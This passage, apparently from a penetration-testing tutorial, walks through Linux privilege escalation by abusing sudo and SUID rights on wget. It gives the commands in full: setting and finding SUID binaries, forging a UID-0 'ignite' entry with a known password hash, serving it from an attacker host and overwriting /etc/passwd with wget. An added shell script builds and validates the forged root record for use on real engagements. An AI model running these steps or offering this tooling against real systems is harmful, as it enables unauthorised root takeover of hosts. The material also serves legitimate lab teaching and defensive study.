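On a real engagement replace make_sample_capture with the "hash" file nc wrote; the rest of the script is unchanged.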
Since we now have the credentials of user raj, we can switch to that account and, because raj is a sudoer on this machine, use sudo to obtain a root shell:
su raj
sudo su
And finally we have root access; this is how a root shell is spawned by exploiting wget's sudo rights.
[Image: 10.png?w=687&ssl=1]
SUID Lab setups for Privilege Escalation
SUID (Set User ID) is a permission bit that makes a file execute with the privileges of its owner rather than those of the user who runs it. A root-owned file with the SUID bit set therefore runs with root privileges. If we are on the target as a non-root user and find SUID-enabled binaries, those programs run as root on our behalf.
Now we set the SUID bit on wget so that a local user can run wget with the privileges of its owner, root.
Type the following to locate the binary, enable the SUID bit and confirm it (the "s" in the owner's execute position of the ls output):
which wget
chmod u+s /usr/bin/wget
ls -al /usr/bin/wget
[Image: 11.png?w=687&ssl=1]
Exploiting SUID
Now compromise the target again and use the find command to identify binaries that have the SUID bit set:
find / -perm -u=s -type f 2>/dev/null
The SUID bit is enabled on many binaries here, but the one we are interested in is /usr/bin/wget.
[Image: 12.png?w=687&ssl=1]
Because wget now runs as root, we can use it to escalate by injecting a new user into /etc/passwd. (The same SUID bit also lets wget read any file as root, so the --post-file trick from the previous section works here too, without sudo.)
First, look at the end of /etc/passwd with the tail command, which reads the file from its end, to confirm that the last entry is the user "test".
[Image: 16.png?w=687&ssl=1]
Now generate a password hash for the new user with openssl, as in the screenshot below (MD5-crypt, salt "ignite", password "pass123"):
openssl passwd -1 -salt ignite pass123
This gives a hash like "$1$ignite$3eTbJm980Hz.k1NTdNxe1"; copy it for later use.
[Image: 17.png?w=687&ssl=1]
Next, copy the entire content of /etc/passwd to our local machine and add a new record for the user "ignite", pasting the hash into its password field as shown below. The record must give ignite UID 0 and GID 0 so that it carries root's identity, and every existing line must be kept intact: a truncated or malformed passwd file locks everyone out, root included.
[Image: 18.png?w=687&ssl=1]
Save this file as "passwd" and start Python's built-in HTTP server (it listens on port 8000 by default) to transfer the file to the victim's machine:
python -m SimpleHTTPServer
[Image: 19.png?w=687&ssl=1]
Now we replace the original /etc/passwd with our modified file. wget -O writes the download to the given filename, and because wget is SUID root it can write inside /etc and overwrite the existing passwd file. Download it from our machine (Kali Linux), where the modified file is served on port 8000:
cd /etc
wget -O passwd http://<Attacker IP>:8000/passwd
Now let’s switch to ignite that owns the root user’s privileges and access the root shell.
su ignite
password: pass123
id

1
2
3

su ignite
password: pass123
id

As the image below shows, we have escalated to root privileges by abusing the SUID permission on wget.
[Image: 20.png?w=687&ssl=1]
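The risky step in this procedure is the edited passwd file: once SUID wget overwrites /etc/passwd there is no undo, and a bad copy locks everyone out. The following shell script, added here as an example and not part of the original post, builds the UID-0 record for "ignite" with the hash the post obtains from openssl, appends it to a local copy of the target's passwd file, and sanity-checks the copy before it is served and pulled onto the target. The four-line passwd file it works on is constructed sample data.

```shell
#!/bin/sh
# Added example (not from the original post): prepare and validate the
# modified passwd file before pushing it onto the target with SUID wget.
# The hash is the MD5-crypt value the post gets from
#   openssl passwd -1 -salt ignite pass123
IGNITE_HASH='$1$ignite$3eTbJm980Hz.k1NTdNxe1'

# Constructed stand-in for the victim's /etc/passwd (sample data).
make_sample_passwd() {
    printf 'root:x:0:0:root:/root:/bin/bash\n'
    printf 'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n'
    printf 'raj:x:1000:1000:raj,,,:/home/raj:/bin/bash\n'
    printf 'test:x:1001:1001:,,,:/home/test:/bin/bash\n'
}

# Print a passwd(5) record: name:hash:uid:gid:gecos:home:shell.
# A hash in field 2 makes login/su use it directly instead of /etc/shadow;
# uid 0 and gid 0 give the account root's identity whatever its name is.
build_root_record() {   # $1 = user name, $2 = crypt hash
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$2"
}

# Append the record to the local copy. Refuse if the name already exists:
# a duplicate entry makes su/login behaviour unpredictable.
inject_record() {   # $1 = passwd copy, $2 = user name, $3 = crypt hash
    if awk -F: -v u="$2" '$1 == u { found = 1 } END { exit !found }' "$1"; then
        echo "user $2 already present in $1" >&2
        return 1
    fi
    build_root_record "$2" "$3" >> "$1"
}

# Checks to run before this file replaces the real /etc/passwd: every line
# has exactly 7 fields, the original root entry is still there, and the
# injected user really is uid 0 / gid 0. Returns non-zero on any failure.
validate_passwd() {   # $1 = passwd copy, $2 = injected user name
    awk -F: -v u="$2" '
        NF != 7                       { print "bad field count on line " NR > "/dev/stderr"; bad = 1 }
        $1 == "root" && $3 == 0       { root_ok = 1 }
        $1 == u && $3 == 0 && $4 == 0 { user_ok = 1 }
        END { exit (bad || !root_ok || !user_ok) }' "$1"
}

WORK=$(mktemp -d)
make_sample_passwd > "$WORK/passwd"
inject_record "$WORK/passwd" ignite "$IGNITE_HASH"
validate_passwd "$WORK/passwd" ignite && echo "passwd copy OK: $WORK/passwd"
# Then serve it and pull it onto the target, as in the post:
#   python -m SimpleHTTPServer                                  # attacker, port 8000
#   cd /etc && wget -O passwd http://<Attacker IP>:8000/passwd  # victim, SUID wget
#   su ignite   (password pass123), then: id
```

In practice the copy fed to inject_record is the real /etc/passwd fetched from the target (for instance with the --post-file trick), so that nothing but the appended line differs from the original.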